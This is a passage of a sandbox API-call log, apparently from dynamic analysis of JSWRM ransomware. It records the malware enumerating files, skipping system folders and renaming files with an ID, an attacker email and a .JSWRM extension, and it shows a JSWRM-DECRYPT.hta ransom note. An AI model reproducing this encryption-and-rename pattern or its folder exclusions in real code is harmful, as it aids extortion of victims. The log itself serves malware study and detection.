ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb198bf00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaremr.dll.mui", cAlternateFileName="")) returned 1 [0069.208] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2=".") returned 1 [0069.208] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="..") returned 1 [0069.208] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="...") returned 1 [0069.208] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="windows") returned -1 [0069.208] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="recovery") returned -1 [0069.208] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="perflogs") returned -1 [0069.208] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="documents and settings") returned 1 [0069.208] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.209] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="system volume information") returned -1 [0069.209] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="msocache") returned -1 [0069.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaremr.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaremr.dll.mui", cchWideChar=16, lpMultiByteStr=0x240f48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaremr.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaremr.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaremr.dll.mui", cchWideChar=16, lpMultiByteStr=0x240fc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaremr.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.209] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9454425611678720) returned 0 [0069.209] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.209] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.209] CloseHandle (hObject=0xffffffff) returned 1 [0069.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0069.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0069.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0069.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0069.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.210] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.210] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb198bf00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaremr.dll.mui", cAlternateFileName="")) returned 0 [0069.210] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.210] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe5954c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fe5954c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fe5954c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.210] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.210] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.210] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.210] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.210] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.210] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.210] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.210] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.211] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.211] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0069.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0069.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0069.211] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0069.211] lstrcmpiW (lpString1="msadce.dll", lpString2=".") returned 1 [0069.211] lstrcmpiW (lpString1="msadce.dll", lpString2="..") returned 1 [0069.211] lstrcmpiW (lpString1="msadce.dll", lpString2="...") returned 1 [0069.211] lstrcmpiW (lpString1="msadce.dll", lpString2="windows") returned -1 [0069.211] lstrcmpiW (lpString1="msadce.dll", lpString2="recovery") returned -1 [0069.211] lstrcmpiW (lpString1="msadce.dll", lpString2="perflogs") returned -1 [0069.211] lstrcmpiW (lpString1="msadce.dll", lpString2="documents and settings") returned 1 [0069.211] lstrcmpiW (lpString1="msadce.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.211] lstrcmpiW (lpString1="msadce.dll", lpString2="system volume information") returned -1 [0069.211] lstrcmpiW (lpString1="msadce.dll", lpString2="msocache") returned -1 [0069.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadce.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadce.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadce.dll", lpUsedDefaultChar=0x0) returned 10 [0069.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadce.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadce.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadce.dll", lpUsedDefaultChar=0x0) returned 10 [0069.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0069.212] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41dce0ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41dce0ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41dce0ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadcer.dll", cAlternateFileName="")) returned 1 [0069.212] lstrcmpiW (lpString1="msadcer.dll", lpString2=".") returned 1 [0069.212] lstrcmpiW (lpString1="msadcer.dll", lpString2="..") returned 1 [0069.212] lstrcmpiW (lpString1="msadcer.dll", lpString2="...") returned 1 [0069.212] lstrcmpiW (lpString1="msadcer.dll", lpString2="windows") returned -1 [0069.212] lstrcmpiW (lpString1="msadcer.dll", lpString2="recovery") returned -1 [0069.212] lstrcmpiW (lpString1="msadcer.dll", lpString2="perflogs") returned -1 [0069.212] lstrcmpiW (lpString1="msadcer.dll", lpString2="documents and settings") returned 1 [0069.212] lstrcmpiW (lpString1="msadcer.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.212] lstrcmpiW (lpString1="msadcer.dll", lpString2="system volume information") returned -1 [0069.212] lstrcmpiW (lpString1="msadcer.dll", lpString2="msocache") returned -1 [0069.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcer.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcer.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadcer.dll", lpUsedDefaultChar=0x0) returned 11 [0069.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0069.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcer.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcer.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadcer.dll", lpUsedDefaultChar=0x0) returned 11 [0069.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0069.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.212] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3b400, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadco.dll", cAlternateFileName="")) returned 1 [0069.212] lstrcmpiW (lpString1="msadco.dll", lpString2=".") returned 1 [0069.212] lstrcmpiW (lpString1="msadco.dll", lpString2="..") returned 1 [0069.212] lstrcmpiW (lpString1="msadco.dll", lpString2="...") returned 1 [0069.212] lstrcmpiW (lpString1="msadco.dll", lpString2="windows") returned -1 [0069.212] lstrcmpiW (lpString1="msadco.dll", lpString2="recovery") returned -1 [0069.212] lstrcmpiW (lpString1="msadco.dll", lpString2="perflogs") returned -1 [0069.212] lstrcmpiW (lpString1="msadco.dll", lpString2="documents and settings") returned 1 [0069.213] lstrcmpiW (lpString1="msadco.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.213] lstrcmpiW (lpString1="msadco.dll", lpString2="system volume information") returned -1 [0069.213] lstrcmpiW (lpString1="msadco.dll", lpString2="msocache") returned -1 [0069.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadco.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadco.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadco.dll", lpUsedDefaultChar=0x0) returned 10 [0069.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadco.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadco.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadco.dll", lpUsedDefaultChar=0x0) returned 10 [0069.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.213] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadcor.dll", cAlternateFileName="")) returned 1 [0069.213] lstrcmpiW (lpString1="msadcor.dll", lpString2=".") returned 1 [0069.213] lstrcmpiW (lpString1="msadcor.dll", lpString2="..") returned 1 [0069.213] lstrcmpiW (lpString1="msadcor.dll", lpString2="...") returned 1 [0069.213] lstrcmpiW (lpString1="msadcor.dll", lpString2="windows") returned -1 [0069.213] lstrcmpiW (lpString1="msadcor.dll", lpString2="recovery") returned -1 [0069.213] lstrcmpiW (lpString1="msadcor.dll", lpString2="perflogs") returned -1 [0069.213] lstrcmpiW (lpString1="msadcor.dll", lpString2="documents and settings") returned 1 [0069.213] lstrcmpiW (lpString1="msadcor.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.213] lstrcmpiW (lpString1="msadcor.dll", lpString2="system volume information") returned -1 [0069.213] lstrcmpiW (lpString1="msadcor.dll", lpString2="msocache") returned -1 [0069.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcor.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcor.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadcor.dll", lpUsedDefaultChar=0x0) returned 11 [0069.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcor.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcor.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadcor.dll", lpUsedDefaultChar=0x0) returned 11 [0069.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0069.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.214] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x44400, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadds.dll", cAlternateFileName="")) returned 1 [0069.214] lstrcmpiW (lpString1="msadds.dll", lpString2=".") returned 1 [0069.214] lstrcmpiW (lpString1="msadds.dll", lpString2="..") returned 1 [0069.214] lstrcmpiW (lpString1="msadds.dll", lpString2="...") returned 1 [0069.214] lstrcmpiW (lpString1="msadds.dll", lpString2="windows") returned -1 [0069.214] lstrcmpiW (lpString1="msadds.dll", lpString2="recovery") returned -1 [0069.214] lstrcmpiW (lpString1="msadds.dll", lpString2="perflogs") returned -1 [0069.214] lstrcmpiW (lpString1="msadds.dll", lpString2="documents and settings") returned 1 [0069.214] lstrcmpiW (lpString1="msadds.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.214] lstrcmpiW 